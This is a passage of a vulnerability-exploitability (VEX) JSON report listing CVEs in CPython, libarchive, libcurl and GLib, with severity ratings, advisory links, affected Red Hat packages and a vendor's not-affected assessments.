      "description": "The \"profiling.sampling\" module (Python 3.15+) and \"asyncio introspection capabilities\" (3.14+, \"python -m asyncio ps\" and \"python -m asyncio pstree\") features could be used to read and write addresses in a privileged process if that process connected to a malicious or \"infected\" Python process via the remote debugging feature. This vulnerability requires persistently and repeatedly connecting to the process to be exploited, even after the connecting process crashes with high likelihood due to ASLR.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5713"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/15/6"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19019"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19176"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5713"
        },
        {
          "url": "https://bugzilla.redhat.com/2431367"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/2458239"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431367"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458239"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0865"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4519"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-5713"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-19176.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:19019"
        },
        {
          "url": "https://github.com/python/cpython/commit/289fd2c97a7e5aecb8b69f94f5e838ccfeee7e67"
        },
        {
          "url": "https://github.com/python/cpython/commit/316f6265b7f9ca4ffed5346b747475ef1943f35d"
        },
        {
          "url": "https://github.com/python/cpython/issues/148178"
        },
        {
          "url": "https://github.com/python/cpython/pull/148187"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-5713.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19176.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/OG4RHARYSNIE22GGOMVMCRH76L5HKPLM/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5713"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5713"
        }
      ],
      "published": "2026-04-14T16:16:48+00:00",
      "updated": "2026-07-31T14:16:50+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-5745",
      "ratings": [
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        476
      ],
      "description": "A flaw was found in libarchive. A NULL pointer dereference vulnerability exists in the ACL parsing logic, specifically within the archive_acl_from_text_nl() function. When processing a malformed ACL string (such as a bare \"d\" or \"default\" tag without subsequent fields), the function fails to perform adequate validation before advancing the pointer. An attacker can exploit this by providing a maliciously crafted archive, causing an application utilizing the libarchive API (such as bsdtar) to crash, resulting in a Denial of Service (DoS).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5745"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:8944"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5745"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455921"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5745"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8581-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5745"
        }
      ],
      "published": "2026-04-07T16:16:32+00:00",
      "updated": "2026-06-17T10:59:35+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.5.3-9.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-5773",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        918
      ],
      "description": "libcurl might in some circumstances reuse the wrong connection for SMB(S)\ntransfers.\n\nlibcurl features a pool of recent connections so that subsequent requests can\nreuse an existing connection to avoid overhead.\n\nWhen reusing a connection a range of criteria must be met. Due to a logical\nerror in the code, a network transfer operation that was requested by an\napplication could wrongfully reuse an existing SMB connection to the same\nserver that was using a different 'share' than the new subsequent transfer\nshould.\n\nThis could in unlucky situations lead to the download of the wrong file or the\nupload of a file to the wrong place. When this happens, the same credentials\nare used and the server name is the same.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5773"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/29/9"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5773"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-5773.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-5773.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-rp9q-8q5w-ch44"
        },
        {
          "url": "https://hackerone.com/reports/3650689"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5773"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8525-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5773"
        }
      ],
      "published": "2026-05-13T13:01:56+00:00",
      "updated": "2026-06-17T10:59:37+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58010",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 8.2,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 8.2,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        126
      ],
      "description": "A flaw was found in GLib. An off-by-one error can occur in the gvs_tuple_is_normal function in the glib/gvariant-serialiser.c file when doing an alignment padding check because the bounds check uses > instead of >=, causing an out-of-bounds read of only 1 byte. This issue can cause a minor information disclosure of 1 byte and a denial of service when the out-of-bounds read crosses a page boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58010"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49512"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55440"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58010"
        },
        {
          "url": "https://bugzilla.redhat.com/2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/2492245"
        },
        {
